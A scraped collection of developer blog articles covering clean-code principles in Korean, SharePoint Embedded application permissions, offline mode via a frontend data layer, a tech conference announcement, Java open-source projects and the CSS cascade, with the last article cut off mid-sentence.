훨씬 이해하기 쉬운데, 이는 메서드와 변수들의 이름을 통해 그 역할과 존재 의의를 명확하게 정의해 주었기 때문이죠. **2.함수는 간단하게 하라** 함수는 단 하나의 기능만 수행해야 해요. 길이가 20줄 이상을 넘어가지 않는 것을 권장합니다. ``` def process_data(data): filtered_data = [item for item in data if item['value'] > 10] sorted_data = sorted(filtered_data, key=lambda x: x['value']) transformed_data = [{'id': item['id'], 'value': item['value'] * 2} for item in sorted_data] for item in transformed_data: print(f"ID: {item['id']}, Value: {item['value']}") ``` 이 함수는 무려 4개의 기능을 수행하는데, 각각의 기능을 다른 함수 안에 넣어야 합니다. **3.코멘트를 남발하지 마라** 코멘트는 저작권을 표기하거나, 이해하기 어려운 함수를 설명하거나, 의도를 밝히거나, 경고성 문구가 아니라면 쓰지 마세요. ``` // Returns an instance of the Responder being tested. protected abstract Responder responderInstance(); ``` ``` // Don't run unless you // have some time to kill. public void _testWithReallyBigFile() { writeLinesToFile(10000000); response.setBody(testFile); response.readyToSend(this); String responseString = output.toString(); assertSubString("Content-Length: 1000000000", responseString); assertTrue(bytesSent > 1000000000); } ``` 위 코드에는 설명을 위한, 아래 코드에는 경고를 위한 코멘트가 달려 있습니다. 이런 코멘트들이 좋다고 할 수 있어요. **4.구조를 깔끔히 하라** 책에서는 수직/수평 구조에 대해서 설명합니다. 세로로는 코드를 신문처럼 중요도에 따라서 위-아래로 정렬하고, 사용처에서 가장 가까운 곳에 변수를 정의해야 합니다. 또 가로로는 코드가 화면을 벗어나지 않게 하고, 짧든 길든 항상 들여쓰기를 해야 클린한 코드가 됩니다. **5. 디미터의 법칙을 준수하라** 디미터의 법칙은 객체는 다른 객체의 내부 세부 사항에 의존하지 말고, 제공된 인터페이스를 통해서만 상호작용해야 한다는 법칙입니다. ``` class Engine { public void start() { System.out.println("Engine started"); } } class Car { private Engine engine; public Car() { this.engine = new Engine(); } public Engine getEngine() { return engine; } } class Driver { public void startCar(Car car) { car.getEngine().start(); } } public class Main { public static void main(String[] args) { Car car = new Car(); Driver driver = new Driver(); driver.startCar(car); } } ``` 여기서는 driver가 car의 내부 구조 (engine)에 대해서 알고 있기 때문에 디미터의 법칙을 위반합니다. ``` class Engine { public void start() { System.out.println("Engine started"); } } class Car { private Engine engine; public Car() { this.engine = new Engine(); } public void startEngine() { engine.start(); } } class Driver { public void startCar(Car car) { car.startEngine(); } } public class Main { public static void main(String[] args) { Car car = new Car(); Driver driver = new Driver(); driver.startCar(car); // } } ``` 이 코드는 Driver가 car의 내부 기능을 몰라도 되기 때문에 클린 코드라고 할 수 있겠죠. **6.오류 코드를 예외로 대체하라** ``` class FileReader { public void readFile(String filePath) throws FileNotFoundException { if (filePath == null) { throw new FileNotFoundException("File path is null"); } System.out.println("Reading file: " + filePath); } } public class Main { public static void main(String[] args) { FileReader fileReader = new FileReader(); try { fileReader.readFile(null); System.out.println("File read successfully"); } catch (FileNotFoundException e) { System.out.println("Error: " + e.getMessage()); } } } ``` 위 코드는 오류가 생길 때 -1을 반환하거나 하지 않고, 즉시 FileNotFoundException을 발생시키기 때문에 더 깔끔합니다. 이에 관련하여 클린한 객체 지향 프로그래밍을 위해 매우 중요한 SOLID 원칙 또한 알아보겠습니다. **S (Single responsibility):** 함수와 마찬가지로, 한 클래스가 하나의 역할만 해야 한다는 원칙입니다. **O (Open-closed):** 코드가 확장에는 열려 있으되, 수정에는 닫혀 있어야 한다는 원칙입니다. **L (Liskov substitution):** 기반 클래스가 할 수 있는 모든 일은 파생 클래스 또한 할 수 있어야 합니다. 이 원칙을 설명하기 위해 흔히 사용되는 예시인 직사각형과 정사각형입니다. ``` class Rectangle { protected int width; protected int height; public void setWidth(int width) { this.width = width; } public void setHeight(int height) { this.height = height; } public int getWidth() { return width; } public int getHeight() { return height; } public int getArea() { return width * height; } } class Square extends Rectangle { @Override public void setWidth(int width) { this.width = width; this.height = width; } @Override public void setHeight(int height) { this.width = height; this.height = height; } } public class Main { public static void main(String[] args) { Rectangle rectangle = new Rectangle(); rectangle.setWidth(5); rectangle.setHeight(10); System.out.println("Rectangle area: " + rectangle.getArea()); Rectangle square = new Square(); square.setWidth(5); square.setHeight(10); System.out.println("Square area: " + square.getArea()); } } ``` 이 코드는 LSP를 위반했기 때문에 정사각형의 면적이 잘못 계산됩니다. 이를 해결하려면 직사각형과 정사각형을 별도의 클래스로 만들고 같은 인터페이스를 써야 합니다. ``` interface Shape { int getArea(); } class Rectangle implements Shape { protected int width; protected int height; public Rectangle(int width, int height) { this.width = width; this.height = height; } public int getWidth() { return width; } public int getHeight() { return height; } @Override public int getArea() { return width * height; } } class Square implements Shape { private int side; public Square(int side) { this.side = side; } public int getSide() { return side; } @Override public int getArea() { return side * side; } } public class Main { public static void main(String[] args) { Shape rectangle = new Rectangle(5, 10); System.out.println("Rectangle area: " + rectangle.getArea()); Shape square = new Square(5); System.out.println("Square area: " + square.getArea()); } } ``` **I (Interface segregation):** 클라이언트가 사용하지 않는 인터페이스에 의존해서는 안 됩니다. ``` interface Worker { void work(); } interface Eater { void eat(); } class Human implements Worker, Eater { @Override public void work() { System.out.println("Human is working"); } @Override public void eat() { System.out.println("Human is eating"); } } class Robot implements Worker { @Override public void work() { System.out.println("Robot is working"); } } ``` 여기서 work와 eater가 따로 정의됐기 때문에 Robot은 불필요한 eat 메서드를 구현할 필요가 없어집니다. **D (Dependency Inversion):** 상위 모듈은 하위 모듈에 의존해서는 안 된다는 원칙입니다. 이외에도 디자인이나 시스템에 관련된 더 복잡한 원칙들이 존재합니다. 버그를 일으키지는 않지만 이러한 원칙들을 지키지 않아 유지 보수성이 떨어지는 코드를 code smell(냄새나는 코드)이라고 하며, 냄새를 감지하기 위해서 다양한 도구들이 존재합니다.
dongdiri96
1,918,532
Mastering Application Permissions in SharePoint Embedded
In the previous article, Containers and Files Security in SharePoint Embedded, we explored the power...
26,993
2024-07-16T06:30:00
https://intranetfromthetrenches.substack.com/p/application-permissions-in-sharepoint-embedded
sharepoint
In the previous article, [Containers and Files Security in SharePoint Embedded](https://intranetfromthetrenches.substack.com/p/containers-files-security-in-sharepoint-embedded), we explored the power of content permissions for controlling access to container data. But security in SharePoint Embedded goes beyond just files and containers. Applications themselves play a crucial role in managing access and functionalities. ![Man reading content of a filing cabinet by National Cancer Institute from Unsplash](https://substackcdn.com/image/fetch/w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c7f5d60-0aa7-4084-91ab-dc3dfd09d163_2112x1344.png) This article dives deeper into the world of SharePoint Embedded application permissions. We'll uncover the different types of applications, how they interact with permissions, and the various roles you can define for granular control. By understanding these concepts, you'll be well-equipped to build secure and scalable solutions that empower your users within SharePoint. ## Understanding Applications Applications in SharePoint Embedded act as your tools for managing content and containers. Each application requires a Microsoft Entra ID identity, ensuring a secure environment. Additionally, they need specific Microsoft Graph permissions to call the corresponding endpoints. There are two main types of applications, each playing a distinct role: - **Owning Application:** This application acts as the leader, directly linked to a container type. It's responsible for creating both the container type and its individual containers. Imagine it as the architect, designing the blueprints and laying the foundation. It also has complete control over these containers and their content. - **Guest Application:** As the name suggests, this application focuses on managing the content that lives inside containers. Think of it as the interior designer, arranging and presenting the content within the established structure. ## Knowing Tenants The concept of tenants is crucial when working with SharePoint Embedded applications. Tenants are essentially spaces where you build your solutions on top of the containers. Here's a breakdown of the two key tenants: - **Development Tenant:** This is your starting point! Here, you'll create and configure your Container Type and assign the owning application. - **Consuming Tenant:** This is the final point! This is where the Container Type is used so, containers are created. All data will be under the consuming tenant scope. ## Defining Permissions Permissions in SharePoint Embedded allow you to delegate control over different aspects of your solutions to applications. They can be combined to create various user roles and organize user actions effectively. Here's a breakdown of the permission sets available, categorized by their scope: - **Content:** - **ReadContent:** Allows applications to read existing content within containers. - **WriteContent:** Allows applications to write content (files) to containers. - **Container:** - **Create:** Allows applications to create new containers. - **Delete:** Allows applications to delete containers. - **Read:** Allows applications to read container metadata. - **Write:** Allows applications to update container metadata. - **Permission Management:** - **EnumeratePermissions:** Allows applications to list container members and their roles. - **AddPermissions:** Allows applications to add new members to containers. - **UpdatePermissions:** Allows applications to change the role of existing members in the container. - **DeletePermissions:** Allows applications to remove members from containers (excluding itself). - **DeleteOwnPermissions:** Allows applications to remove themselves from container permissions. - **ManagePermissions:** Allows applications to perform all permission-related actions (add, update, remove, including itself). There are two additional special permissions to be aware of: - **None:** The application has no access to containers. - **Full:** The application has all available permissions (use with caution). ## Roles This table provides a basic framework for defining roles with specific access levels to container content and management. You can adapt these roles further based on your specific needs and security requirements. - **Viewer:** Can only view the content and basic metadata of containers. - **Contributor:** Can view, create, edit, and delete the content of containers and read the container metadata. - **Editor:** Can view, create, edit content, manage basic container metadata, and see who has access to the container. - **Administrator:** Has full control over containers, including managing content, metadata, and permissions of other users. - **Auditor:** Can view container metadata and list members with their roles, but cannot access content. - **Content Manager:** Can view and modify the content of containers, but cannot create, delete, or manage container metadata or permissions. - **Container Manager:** Can create and delete containers, as well as view and edit their metadata. Cannot manage content or permissions. - **Permission Manager:** Can manage permissions for containers, including adding, removing, and modifying user roles. Cannot access content or container metadata. ![SharePoint Embedded Applications Permissions Table](https://substackcdn.com/image/fetch/w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f0d6702-b075-43fd-95e5-394e866f913c_800x400.png) ## A Real-World Example Let's imagine our business is an art gallery and we want to leverage SharePoint Embedded to create a solution. We want a system for artists to manage their artworks, a jury to evaluate submissions, and a public platform to showcase the art. While it's possible to build everything into one app, we can leverage SharePoint Embedded's features to create a more secure and manageable solution with separate applications: 1. **Artist Portfolio:** This artist-facing application allows them to view submitted artworks, track performance metrics, and update their profiles. 2. **Curatorial Review App:** A secure application for jury members to review submissions, leave feedback, and manage roles (for administrators). 3. **Public Artwork Gallery Website:** This website showcases the artwork available in the gallery. Users can browse submissions, view artist biographies, and potentially initiate purchases (without write access for this application). There wouldn't be a need for the public website to modify any content within SharePoint. ### Assigning Permissions for Secure Access Control Each application in this scenario will have a designated role within the SharePoint Embedded architecture: - **Artist Portfolio App:** This application requires `ReadContent` and `WriteContent` permissions. Artists can upload their works, view existing submissions, and update their profiles. Additionally, if the solution allows new artist registration, permissions like `Create`, `Read`, and `Update` might be needed for managing their own containers. - **Curatorial Review App:** `ReadContent` permission is sufficient for jury members to access and review submissions. They can also leave private feedback notes for artists. Depending on permission settings, they might have access to view other jurors' notes. For administrators managing roles, additional permissions like `EnumeratePermissions`, `AddPermissions`, and `UpdatePermissions` might be necessary. - **Public Artwork Gallery Website:** Since this is a public website, it only requires `ReadContent` permission to display the artwork information. There's no need for write access to modify content within SharePoint. ## Conclusion By understanding applications, tenants, permissions, and roles, you're equipped to build secure and scalable solutions with SharePoint Embedded. This approach allows for granular control over user access and data, ensuring a robust foundation for your custom SharePoint Embedded experiences. Remember, this is just a starting point. As you delve deeper into SharePoint Embedded, you'll discover a vast array of possibilities for crafting unique and valuable applications! ## References - *Containers and Files Security in SharePoint Embedded: [https://intranetfromthetrenches.substack.com/p/containers-files-security-in-sharepoint-embedded](https://intranetfromthetrenches.substack.com/p/containers-files-security-in-sharepoint-embedded)* - *SharePoint Embedded authentication and authorization: [https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/auth](https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/auth)* - *SharePoint Embedded app architecture: [https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/app-architecture](https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/app-architecture)* - *Register file storage container type application permissions: [https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/register-api-documentation](https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/register-api-documentation)* - *Man reading content of a filing cabinet by National Cancer Institute from Unsplash: [https://unsplash.com/es/fotos/foto-en-escala-de-grises-de-un-hombre-89rul39ox2I](https://unsplash.com/es/fotos/foto-en-escala-de-grises-de-un-hombre-89rul39ox2I)*
jaloplo
1,918,641
How having a Data Layer simplified Offline Mode in my frontend app - Part 1
You're done with a project and the product team comes to you and says: "Hey, I turned off my internet...
0
2024-07-15T14:02:07
https://dev.to/belgamo/how-having-a-data-layer-simplified-offline-mode-in-my-frontend-app-part-1-5ahc
offline, pwa, data, repository
You're done with a project and the product team comes to you and says: "Hey, I turned off my internet and the app died". You stop for a moment and don't recall seeing this requirement throughout the development. You're afraid because whatever you answer will make them frustrated. Well, there's clearly a lack of communication but you're as guilty as them for not having raised that up before. ## The Challenge Our project was a very traditional web app fully dependent on a network connection to work. The app wasn't designed to work offline at all and we hadn't followed any of the offline-first patterns. When a route was accessed, a request was dispatched to get the data needed for that screen. If it succeeded, its result was stored on the local state of the component that was then rerendered. Pretty simple, right? But it was also going against the offline-first good practices. There was a good thing though, the architectural decisions we made. We'll be talking about it in a bit, but let's focus on the problem first of all. ## Partial vs Full Offline experience We faced a clear conflict with the product team that needed resolution ASAP. To product people, enabling offline mode might seem as simple as pressing a button, expecting everything to work out of the box. However, they often overlook that a lack of internet inherently limits the app's functionality. To address this, we scheduled a meeting to clarify their offline requirements. Did they need the entire app to work offline or just certain parts? Should all features be available, or only the essential ones? This is crucial and my first advice to you: thoroughly understand what the stakeholders want so you can make the right decisions. Failing to get this right initially can lead to back-and-forth discussions. With clear answers, you can determine the right approach for enabling offline capabilities. In our case, we discovered they only needed offline functionality for a specific part of the app used by one user group. This realization simplified our task by at least 30%. Additionally, most writing operations could be disabled offline, allowing us to avoid the complex process of reconciliation/synchronization. Ultimately, it's about managing trade-offs and finding the best middle-ground solution. ## The Data Layer to the Rescue One of the most powerful patterns when it comes to front-end development is to try to keep your UI as dumb as possible. There are several benefits in doing that such as easy testability, debugging, and the possibility to **inject dependencies** into your components. This last one in particular was what saved our lives because the data were abstracted into a completely separate layer and we were connecting it with the UI layer through **dependency injection**. It looked something like this: ![diagram showing the current app data flow](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hnbgfr2fkq38agvg3cvs.png) So in other words, there was an interface which was the only thing the UI layer knew about and the `RemoteDAO` was being injected into it. Well, that being said we could simply create another implementation of the DAO replacing the `RemoteDAO`. However, this new implementation would communicate with local sources of data instead of trying to hit the remote endpoints. We would also need a caching step which is when we store the remote data locally, something like this: ![diagram showing the new app data flow](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xf8cq2tijthgs40s9mhv.png) ## The implementation To show you a practical example, I built a small todo application using Lit + Vite, but it applies to any framework. Think of an app where parents can assign tasks to their children but some tasks need to be done out of home so they might face poor connection or not have any connection at all. That's why we need to leverage offline features. ![animation showing the app in action](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0sohnxybhp5yglwqh6gx.gif) On the app entry point, I inject my `RemoteTodosDAO` instance by using Lit context (similar to React context or a DI container): ```ts @customElement("main-app") export class App extends LitElement { @provide({ context: TodosDAOContext }) remoteTodosDAO = new RemoteTodosDAO(); ... } ``` Then, I'm able to get this instance from any component by doing: ```ts @customElement("todos-page") export class TodosPage extends LitElement { @consume({ context: TodosDAOContext }) todosDAO!: TodosDAO; } ``` By the way, here's is what the `RemoteTodosDAO` looked like: ```ts import axios from "axios"; import { Todo, TodosDAO } from "./types"; export class RemoteTodosDAO implements TodosDAO { private _httpClient = axios.create({ baseURL: "http://localhost:3000" }); async list() { return (await this._httpClient.get<Todo[]>("/todos")).data; } async get(id: string) { return (await this._httpClient.get<Todo>(`/todos/${id}`)).data; } async save(todo: Todo) { return ( await this._httpClient.patch<Todo>(`/todos/${todo.id}`, { ...todo, }) ).data; } } ``` ## Caching data locally I've mentioned our app was triggering requests as necessary when the user got to some route. But since we must cache all data on the first load, we decided to fetch all needed resources (hitting all endpoints) right when the user accessed the app for the first time. By doing that, we don't have to change anything in the UI layer and we can continue triggering requests when the component is mounted. But instead of reaching the remote source, the app will get the cached data. As an alternative to hitting all endpoints at once, you could also create a single endpoint on the backend to get the data in a one-way trip. But remember to take performance into account. Are your users mostly on 4G connections or Wifi? How heavy is your data? You'll want to return as little data as possible to not waste resources, return only the most recent ones if your scenario allows so, or even implement pagination. Now we're going to create a new class to interact with the IndexedDB using [Dexie](https://dexie.org/), a wrapper that makes it easier to create schemas. It works the same way as the DAO, but I'm going to name it "Persistor" for convenience. I'm also including the word "progress" in the table name on purpose, I'll explain why in the second part of the article. ```ts const TodosProgressLocalDB = new Dexie("TodosProgress") as Dexie & { todos: EntityTable<Todo>; }; TodosProgressLocalDB.version(1).stores({ todos: "&id", }); export class DexiePersistor implements TodosPersistor { async saveBatch(todos: Todo[]) { await TodosProgressLocalDB.todos.bulkPut(todos); } } ``` Next, let's update our `RemoteTodosDAO` to receive an instance of the persistor. Given that this app is fairly simple and the `GET /todos` endpoint returns all the necessary data, we’ll pass its response to the persistor’s `saveBatch` method. However, if your app requires multiple requests interacting with different persistors, you can adjust accordingly. Essentially, every time the user accesses the app, we will invalidate the local cache by rehydrating it with fresh data. To optimize performance and reduce backend load, consider some [invalidation strategies](https://medium.com/@lordmoma/the-hard-thing-in-computer-science-cache-invalidation-11ca0da2dba4) to avoid hitting the backend on every single request. ```ts export class RemoteTodosDAO implements TodosDAO { private _todosPersistor: TodosPersistor; constructor(todosPersistor: TodosPersistor) { this._todosPersistor = todosPersistor; } private _httpClient = axios.create({ baseURL: "http://localhost:3000" }); async list() { const data = (await this._httpClient.get<Todo[]>("/todos")).data; this._todosPersistor.saveBatch(data); return data; } async get(id: string) { ... } async save(todo: Todo) { ... } } ``` As long as they land in a route within the app, the request will be triggered and the response cached. One of the drawbacks of this approach is that it increases the first-load time. So make sure you show some kind of spinner to your user to indicate the page is loading. Something like this: ```ts @customElement("main-app") export class App extends LitElement { todosPersistor: TodosPersistor = new DexiePersistor(); @provide({ context: TodosDAOContext }) remoteTodosDAO = new RemoteTodosDAO(this.todosPersistor); private outletRef = createRef(); @state() caching = true; async firstUpdated() { try { await this.remoteTodosDAO.list(); } catch (error) { } finally { this.caching = false; } makeRouter(this.outletRef.value as HTMLElement); } render() { return html` ${this.caching ? html`<p>Caching resources...</p>` : null} <div ${ref(this.outletRef)}></div> `; } } ``` If you check the application tab through the browser inspector, you're going to notice that some data has already been recorded into IndexedDB collections which means we're ready to go to the next and last step to make the **reading part** work. ## Replacing the DAO implementation All we need to do now is create the new implementation of the `TodosDAO` interface, which is going to be used as a replacement for the current one. ```ts export class LocalTodosDAO implements TodosDAO { async list(): Promise<Todo[]> { return await TodosProgressLocalDB.todos.toArray(); } async get(id: string) { return await TodosProgressLocalDB.todos.where("id").equals(id).first(); } save(todo: Todo): Promise<Todo | undefined> { throw new Error("Method not implemented."); } } ``` I left the save method not implemented on purpose as well because I'll be clarifying it in the second part of this article. Alright, let's replace the implementation: ```ts export class App extends LitElement { todosPersistor: TodosPersistor = new DexiePersistor(); remoteTodosDAO = new RemoteTodosDAO(this.todosPersistor); @provide({ context: TodosDAOContext }) localTodosDAO = new LocalTodosDAO(); ... } ``` Now you should be able to turn off your backend server and the app will keep working normally, except for the writing operations. ## PWA & Routing concerns Regarding caching, there are basically two types of resources: assets and data. We just handled data but in order for your app to really work offline you need to cache the static assets such as HTML, CSS, and JS by using a service worker and a manifest file. That's a simple step and if you're using Vite you can achieve that pretty easily with [Vite PWA](https://vite-pwa-org.netlify.app/). You might need to tweak your routes as well if you're using code-splitting. Code-splitting essentially fetches the assets on-demand for a given route to work. However, you don't want your user accessing all the routes in your system beforehand just to get them cached, right? So make sure you disable that, at least for the routes you want to work offline. ## Conclusion Offline mode isn't a trivial topic. It's hard enough when developing a PWA from scratch following offline-first good practices; adding it to an existing app is even harder. However, it's possible to work around and achieve good results if you keep things uncoupled and fully understand the real customer needs. As demonstrated, we managed to get the app functioning offline without altering the UI layer. In the second part, we'll explore how to enable users to perform writing operations offline. The example code is available on GitHub https://github.com/belgamo/partial-offline-poc
belgamo
1,918,731
Infobip Shift returns to Zadar in 2024 – get ready for 3 days of tech innovation and expertise
One of Europe’s premier tech events is returning to Croatia, and for the first time, the event will...
0
2024-07-17T13:05:38
https://shiftmag.dev/infobip-shift-returns-to-zadar-in-2024-get-ready-for-3-days-of-tech-innovation-and-expertise-3663/
event, ai, cybersecurity, programming
--- title: Infobip Shift returns to Zadar in 2024 – get ready for 3 days of tech innovation and expertise published: true date: 2024-07-05 09:13:09 UTC tags: Event,AI,cybersecurity,programming canonical_url: https://shiftmag.dev/infobip-shift-returns-to-zadar-in-2024-get-ready-for-3-days-of-tech-innovation-and-expertise-3663/ --- ![](https://shiftmag.dev/wp-content/uploads/2024/07/Shift.png?x43006) One of Europe’s premier tech events is returning to Croatia, and for the first time, **the event will span three days** , gathering thousands from the global IT industry for the fourth consecutive year. [The conference](https://shift.infobip.com/) kicks off on Sunday, September 15, with **several smaller, diverse, and informal tech events across various locations** in Zadar. The main event continues over the next two days at SC Višnjik. “Infobip Shift aims to innovate each year, enhancing the program, production, and content. Extending to three days increases networking opportunities, a key reason many attend. With **over 80 speakers on six stages** , we strive to invest in the conference, raising its value and setting new standards for tech events”, says Nikola Radesic, Head of Shift Team. ## What’s in store at Infobip Shift 2024? The experts from tech giants such as **Microsoft, Spotify, and Reddit** will be present alongside companies well-known to developers like **Postman, JetBrains, and JFrog**. The conference will feature workshops, an EXPO hall with 30 exhibitors, and indoor and outdoor spaces for meetings and relaxation between sessions. > This year’s topics at Infobip Shift include **ubiquitous AI, increasingly critical cybersecurity, and perennial subjects** like programming tools, front-end and back-end development, and cloud computing. We’ve shaped the program based on industry-relevant topics and feedback from last year’s attendees. > > <cite>Nikola Radesic, Head of Shift Team</cite> ## Showcasing startups, panels, and pitching competitions A special program will be held in Infobip’s Startup Tribe hall, featuring booths of the most interesting **domestic and international startups, panels, and talks** vital for anyone starting or considering a startup. The pitching competition will spotlight startups, allowing them to **present their products to a panel of experts** and a range of global investors who may offer advice and possibly investment. For impressions from last year’s event, watch the [video](https://www.youtube.com/watch?v=pBp3inVCh_g), and for more information on the conference, program, and tickets, visit Infobip Shift’s official [website](https://shift.infobip.com/). The post [Infobip Shift returns to Zadar in 2024 – get ready for 3 days of tech innovation and expertise](https://shiftmag.dev/infobip-shift-returns-to-zadar-in-2024-get-ready-for-3-days-of-tech-innovation-and-expertise-3663/) appeared first on [ShiftMag](https://shiftmag.dev).
shiftmag
1,918,813
7 Open Source Projects You Should Know - Java Edition ✔️
Overview Hi everyone 👋🏼​ In this article, I'm going to look at seven OSS repository that...
27,756
2024-07-14T06:00:00
https://domenicotenace.dev/blog/seven-oss-projects-java-edition/
opensource, github, softwaredevelopment, java
## Overview Hi everyone 👋🏼​ In this article, I'm going to look at seven OSS repository that you should know written in Java, interesting projects that caught my attention and that I want to share. Let's start 🤙🏼​ --- ## 1. [Robolectric](https://robolectric.org/) Robolectric is a unit testing framework for Android. Your tests run in a simulated Android environment inside a JVM, without the overhead and flakiness of an emulator. It tests routinely run 10x faster than those on cold-started emulators 😈 {% embed https://github.com/robolectric/robolectric %} ## 2. [Elasticsearch](https://www.elastic.co/elasticsearch) Elasticsearch is a distributed search and analytics engine optimized for speed and relevance on production-scale workloads. Search in near real-time over massive datasets, perform vector searches, integrate with generative AI applications, and much more 🤠 {% embed https://github.com/elastic/elasticsearch %} ## 3. [dotCMS](https://www.dotcms.com/) dotCMS is an open source headless/hybrid content management system that has been designed to manage and deliver personalized, permission-based content experiences across multiple channels. It can can serve as a content hub and also as a platform for sites, mobile apps, mini-sites, portals, intranets 🤖 {% embed https://github.com/dotCMS/core %} ## 4. [Apache Tika](https://tika.apache.org/) The Apache Tika toolkit detects and extracts metadata and text from over a thousand different file types (such as PPT, XLS, and PDF). All of these file types can be parsed through a single interface, making Tika useful for search engine indexing, content analysis, translation, and much more 🤗 {% embed https://github.com/apache/tika %} ## 5. [GraalVM](https://www.graalvm.org/) GraalVM is a high-performance JDK distribution that compiles your Java applications ahead of time into standalone binaries. These binaries start instantly, provide peak performance with no warmup, and use fewer resources 👾 {% embed https://github.com/oracle/graal %} ## 6. [OpenSearch](https://opensearch.org/docs/latest/about/) OpenSearch is an open source distributed and RESTful search engine, fork of Elasticsearch and Kibana following the license change in early 2021 🔎 {% embed https://github.com/opensearch-project/OpenSearch %} ## 7. [ThingsBoard](https://thingsboard.io/) ThingsBoard is an open-source IoT platform for data collection, processing, visualization, and device management. It enables device connectivity via industry standard IoT protocols: MQTT, CoAP and HTTP and supports both cloud and on-premises deployments 🦾 {% embed https://github.com/thingsboard/thingsboard %} --- ## Conclusion This list lists seven open source projects that are worth checking out, either to use them or even to contribute🖖 Happy coding!✨ --- Hi👋🏻 My name is Domenico, software developer passionate of Vue.js framework, I write article about it for share my knowledge and experience. Don't forget to visit my Linktree to discover my projects 🫰🏻 Linktree: https://linktr.ee/domenicotenace Follow me on dev.to for other articles 👇🏻 {% embed https://dev.to/dvalin99 %} If you like my content or want to support my work on GitHub, you can support me with a very small donation. I would be grateful 🥹 <a href="https://www.buymeacoffee.com/domenicotenace"><img src="https://img.buymeacoffee.com/button-api/?text=Buy me a coffee&emoji=☕&slug=domenicotenace&button_colour=FFDD00&font_colour=000000&font_family=Cookie&outline_colour=000000&coffee_colour=ffffff" /></a>
dvalin99
1,918,816
Mastering CSS: Understanding the Cascade
Cascading Style Sheets (CSS) is a fundamental technology of the web, allowing developers to control...
0
2024-07-15T13:05:38
https://mustcode.it/articles/mastering-css-understanding-the-cascade
css, web, webdev
Cascading Style Sheets (CSS) is a fundamental technology of the web, allowing developers to control the visual presentation of HTML documents. While CSS syntax may seem simple at first glance, the way styles are applied and inherited can be surprisingly complex. Understanding these intricacies is crucial for writing efficient, maintainable, and predictable CSS. In this comprehensive guide, we'll explore the cascade and inheritance concepts of CSS. ## The CSS Cascade The cascade is the algorithm that determines which CSS rules are applied to elements when multiple conflicting rules exist. It's essential to understand how the cascade works to write CSS that behaves as expected. The cascade considers several factors in the following order: - 1 Stylesheet origin - 2 Inline styles - 3 Selector specificity - 4 Source order To be completely exhaustive, we can add: - 2.5 Styles that are defined in layers [read more](https://developer.mozilla.org/en-US/docs/Web/CSS/@layer) - 3.5 Styles that are scoped to a portion of the DOM [read more](https://developer.mozilla.org/en-US/docs/Web/CSS/@scope) Let's break down the factors that influence the cascade, in order of precedence: ### 1. Stylesheet Origin CSS can come from three different sources: - **1** **User-agent styles**: These are the browser's default styles. Each browser has its own set of default styles, which is why unstyled HTML can look slightly different across browsers. - **2** **User styles**: These are custom styles set by the user. While rare, some users may have custom stylesheets to override default styles for accessibility or personal preference. - **3** **Author styles**: These are the styles you write as a web developer. Generally, author styles take precedence over user styles, which in turn override user-agent styles. This allows developers to customise the appearance of elements while still respecting user preferences when necessary. ### 2. Inline Styles Styles applied directly to an element using the style attribute have very high priority: ```html <p style="color: red;">This text will be red.</p> ``` Inline styles will override any styles defined in external stylesheets or `<style>` tags, regardless of their specificity (That’s no longer true if you use the `!important` keyword. I’ll get on that in a second). Using inline styles is *generally* discouraged as it mixes presentation with content and makes styles harder to maintain. ### 3. Selector Specificity Specificity is a crucial concept in CSS that determines which styles are applied to an element when multiple conflicting rules exist. Each CSS selector has a specificity number, which can be calculated to predict which styles will take precedence. Specificity is typically represented as a four-part number (a,b,c,d), where: * a: Number of inline styles (generally omitted) * b: Number of ID selectors * c: Number of class selectors, attribute selectors, and pseudo-classes * d: Number of element selectors and pseudo-elements The resulting number is not base 10. Instead, think of it as separate columns that are compared from left to right. See the examples: - `p` = (0,0,0,1) - `.class` = (0,0,1,0) - `#id` = (0,1,0,0) - Inline style = (1,0,0,0) Consider these two conflicting rules: ```css #header .nav li { color: blue; } /* (0,1,1,1) */ nav > li a { color: red; } /* (0,0,0,3) */ ``` The first rule (0,1,1,1) has higher specificity, so the text would be blue. > Pseudo-class selectors (such as `:hover`) and attribute selectors (such as `[type="text"]`) each have the same specificity as class selectors. > > The universal selector (`*`) and combinators (`>`, `+`, `~`) do not affect specificity. > > Also, the `:not()` pseudo-class also doesn't add to the specificity value; only the selectors inside it are counted. Several online tools can help calculate specificity ([https://specificity.keegan.st/](https://specificity.keegan.st/)). ### 4. Source Order If all else is equal, the rule that appears later in the stylesheet takes precedence: ```css .button { background-color: blue; } .button { background-color: green; } /* This one wins */ ``` In this example, buttons will have a green background. ## A Powerful Override While understanding the cascade is crucial for writing maintainable CSS, there's one more piece of the puzzle that can override all the rules we've discussed so far: the !important keyword. ### How `!important` Works The `!important` keyword can override all other considerations in the cascade, except for other `!important` declarations of higher origin precedence. ```css /* styles.css */ .button { background-color: blue !important; } ``` ```html <!-- index.html --> <head> <link rel="stylesheet" href="styles.css"> </head> <body> <button style="background-color: red"> My button </button> <!-- The color will be blue due to !important above --> </body> ``` In this example, even though inline styles usually have the highest priority, the button will still have a blue background because of the `!important` declaration. ### The Cascade and `!important` The `!important` keyword actually introduces additional layers to the cascade. The full order of precedence, from highest to lowest, is: - User agent important declarations - User important declarations - Author important declarations - Important Inline styles - Important not inlined styles - Author normal declarations - Inline styles - Not inlined styles - User normal declarations - User agent normal declarations ### When to Use it While `!important` can be tempting as a quick fix, it's generally considered a last resort. Overuse can lead to specificity wars and make your CSS harder to maintain. Legitimate use cases include: - Overriding third-party styles you can't modify - Creating utility classes that should always apply - Ensuring critical accessibility styles are applied ### A Potential Solution To Simplify Specificity Management If you find yourself using !important often, consider refactoring your CSS to use more specific selectors or a more modern approach like utilising `:is()` and `:where()` to write more flexible and maintainable styles. (I talk about these two in more details [here](https://mustcode.it/articles/where-is-css)) Also, the `@layer` at-rule, which is fairly 